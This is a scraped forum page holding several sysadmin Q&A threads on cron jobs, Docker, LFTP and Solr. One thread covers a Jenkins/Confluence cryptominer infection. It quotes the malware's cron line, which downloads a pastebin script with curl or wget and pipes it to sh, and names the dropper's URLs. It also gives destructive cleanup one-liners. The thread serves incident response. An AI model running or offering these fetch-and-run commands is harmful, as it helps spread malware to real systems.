Netscaler ADC setup scheduled Clearing Persistence - netscaler

Is there a way of setting up some type of CRON job on the Netscaler VPX running firmware 11.0 to automatically clear Persistence Session Records on a daily basis?
https://docs.citrix.com/en-us/netscaler/12/load-balancing/load-balancing-persistence/clearing-persistence.html

in the /nsconfig folder you have a rc.netscaler file.
Make a entry in the rc.netscaler where you add the cron job.
When you reboot the rc.netscaler will be executed.
You can also put files in the /var directory (survives reboot) and use an entry in /nsconfig/rc.netscaler to copy to /etc/....

setup a cron job on the netscaler freebsd. use the following structure for your command:
nscli -U xxx.xxx.xxx.xxx:nsroot:nsroot "clear lb persistentSessions"
edit to add the following note: keep in mind you will most likely impact anyone connected at the time when running this command (depends on your application)

Related

How to set up 1-way sync from Bitbucket Cloud to a local folder

This might sound like a stupid question, and the use-case is rather simple, but I haven't been able to find a decent and simple solution.
In short:
I have a Bitbucket repo that I want to have synced to a local folder on my local server.
So whenever there's an upstream change, the most updated version of the file must be copied to the local folder. There is never a push/commit from local-to-cloud, it's merely a 1-way read-only sync.
Thanks in advance for any suggestions! (maybe the solution is so obvious that I don't see it?)
You don't explain what software is running on your local server, but assuming this is some flavor of UNIX/Linux/macOS and you have crontab access, the easiest thing is probably to just schedule a cron job to pull updates.
A command like the following will schedule a git update every 60 seconds, logging the output to a file:
echo '* * * * * cd $HOME/path/to/git/workdir && git pull -q --ff-only >> update-log 2>&1' | crontab
Note 1: This assumes your user currently has an empty crontab on the server, if you don't then you should instead use crontab -e to manually append the directive to your existing crontab.
Note 2: You'll need to ensure your account on the server has permission to access the BitBucket repo without a tty connection (e.g. without SSH agent forwarding), so you might need to fiddle with authentication to set that up (which is beyond the scope of this answer). For a public BitBucket repo, cloning via HTTPS without a user name is probably the simplest approach, since no authentication is required.
Note 3: The first * in the directive above can be adjusted to select a different polling frequency, e.g. 0,15,30,45 for every 15 minutes. If you omit the 2>&1 then you should get an email for any errors (assuming SMTP is configured on the server).
Note 4: The git command embedded above assumes you never rewrite history in the upstream git repo or manually modify the local directory. If either is a possibility, then you might instead want to use git pull -q --rebase or even git fetch && git reset --hard '#{upstream}'

Automatically Configure Config inside Docker Container

While setting up and configure some docker containers I asked myself how I could automatically edit some config files inside the container after the containerized service finished installing (since the config files are created at the installation).
I have tried that using a shell file and adding it as the entrypoint in the Dockerfile. However, as I have said the config file does not exist right at the beginning and hence the sed commands in the script fail.
Linking an config files with - ./myConfig.conf:/xy/myConfig.conf is also not an option because the config contains some installation dependent options.
The most reasonable solution I have found was running a script, which edits the config, manually after the installation has finished with docker exec -i mycontainer sh < editconfig.sh
EDIT
My question is formulated in general terms. However, the question arose while working with Nextcloud in a docker-compose setup similar to the official example. That container contains a config.php file which is the general config file of Nextcloud and is generated during the installation. Certain properties of that files have to be changed (there are only a very limited number of environmental variables to specify). Since I am conducting some tests with this container I have to repeatedly reinstall it and thus reedit the config file.
Maybe you can try another approach and have your config file/application pick its settings from the environmental variables. That would be consistent with the 12factor app methodology see here
How I understand your case you need to start your container from creating config by some template.
I see a number of options to do it:
Use some script that generates a config from template and arguments from a command line or environment variables. (Jinja2 and python for example or Mustache and node.js ). In this case, your entrypoint generate the template and after this start application. For change config, you will be forced restart service (container).
Run some service can save the configuration and render you configuration in run time. Personally, I like consul template, we active use this engine in our environment, and have no problems for while. In this case, config is more dynamic and able to be changed "on the fly". In your container, you will have two processes, application, and consul-template daemon. Obviously, you will need to run and maintain consul. For reloading config restart of an application process is enough.
Run a custom script to create the config. :)

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and GitLab runner CI setup to deploy (synchronize) a bunch of JSON files on a server using LFTP. This job however, seems to "freeze" for a few minutes every 10 files roughly. Having to synchronize roughly 400 files sometimes, this job simply crashes because it sometimes takes more than an hour to complete. The JSON files are all 1KB. Neither the source and target servers should have any firewalls rate limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in orer to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD#$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
Job is ran in Docker, using this container to deploy everything. What could cause this?
For those of you coming from google we had the exact same setup. The way to get LFTP to stop hanging when running in a docker or some other CI you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so it won't wait forever or get into a continuous loop
when it can't do a command. This should speed things along.
Makes sure we are using SSL/TLS. If you don't need this remove those
options.
Synchronizes one folder to the new location. The options -Renv can
be explained here: https://lftp.yar.ru/lftp-man.html
Lastly in the gitlab CI I set the job to retry if it fails. This will spin up a new docker instance that gets around any open file or connection limitations. The above LFTP command will run again but since we are using the -n flag it will only move over the files that were missed on the first job if it doesn't succeed. This gets everything moved over without hassle. You can read more about CI job retrys here: https://docs.gitlab.com/ee/ci/yaml/#retry
Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.

how to swap solr core from shell

I have a solr setup with two cores. I want to schedule a core(core1, backend) for full import frequently(e.g. after every 5 mins), then swap with the live(core0, serving) core from shell command through a shceduler.
For full-import command, I am using following shell command
wget -o - -q -t 1 http://localhost:8080/solr/core1/dataimport?command=full-import
Which works fine. If I do a core swap from browser by hitting
http://localhost:8080/solr/admin/cores?action=SWAP&core=core1&other=core0, I get latest update instantly on search. But if I schedule this URL as shell command similar to dataimport, it doesn't do that swap.
Did you try with
curl
"http://'localhost':8080/solr/admin/cores?action=SWAP&core=core1&other=core0"
from shell?
There is catch with the SWAPs
Apache Solr allows to swap two cores around for non-Cloud configurations. They take each other’s name, so it is a good way to push an updated core into a production without downtime.
But an interesting question is how this is achieved. Normally, core name is it’s directory name too. So, does Solr rename the directory on the filesystem too?
Not really! Instead name property in the core.properties file is updated to use the name of the other core. Usually that property is used to give an alternave name of the core for when the directory naming conventions are not suitable.
The gotcha is - of course - that you still have two directories with right looking names for the cores you see in the Admin UI. So, it is very easy to forget that extra redirection/rename step when troubleshooting somebody else’s - or even your own old - setup.

Resources